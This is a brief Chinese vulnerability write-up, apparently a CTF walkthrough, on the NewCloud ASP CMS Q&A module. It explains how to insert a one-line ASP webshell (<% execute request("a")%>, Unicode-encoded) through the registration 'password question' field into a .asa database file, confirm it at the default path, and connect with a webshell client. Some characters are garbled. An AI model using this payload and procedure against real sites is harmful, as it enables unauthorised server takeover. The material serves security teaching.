一、漏洞简介
新云网站内容管理系统是一套开源的WEB网站管理系统,采用目前非常成熟的ASP+Access/SQL开发而成。使用它,我们可以很方便的管理自己的网站,目前新云网站内容管理系统最新的版本是v4.0.0 SP2。本文要介绍的捕洞就出在新云网站内容管理系统v4.0.0 SP1以及未打官方最新补丁的v4.0.O SP2的问吧系统中。
新云的问吧是类似百度知道的互动知识问答分享平台,问吧采用自己的数据库,数据库文件为.asa格式,由于过滤不严,导致可以向数据库中插入一句话木马,从而拿到webshell。
二、测试漏洞
要想利用漏洞,我们需要先注册一个用户,在注册信息中想方设法插入我们的一句话木马。点“用户注册”来注册一个用户,“用户名”、“登录密码”、“邮件地址”等都可以随便填写,但“密码问题”需要特别注意,要填写“+撺数畲整煺焕敞蹉V=-|悄”,也就是<% execute request("a")%>a经过Unicode转码后的代码。
三、实战
1.注册信息全部填写完毕后点“立即注册”按钮,注册成功后我们的一句话木马就插入到数据库中了
密码问题框中插入一句话木马
2.问吧数据库的默认地址是问吧耳录下的data目录下的ask_newasp.asa,直接在浏览器中访问,看到了数据库的代码,拉到网页最下面,看到了熟悉的“类型不匹配:'execute'”,说明一句话木马已经成功的插入到数据库中了。
一句话木马插入成功g
3.使用菜刀链接获取flag
网友评论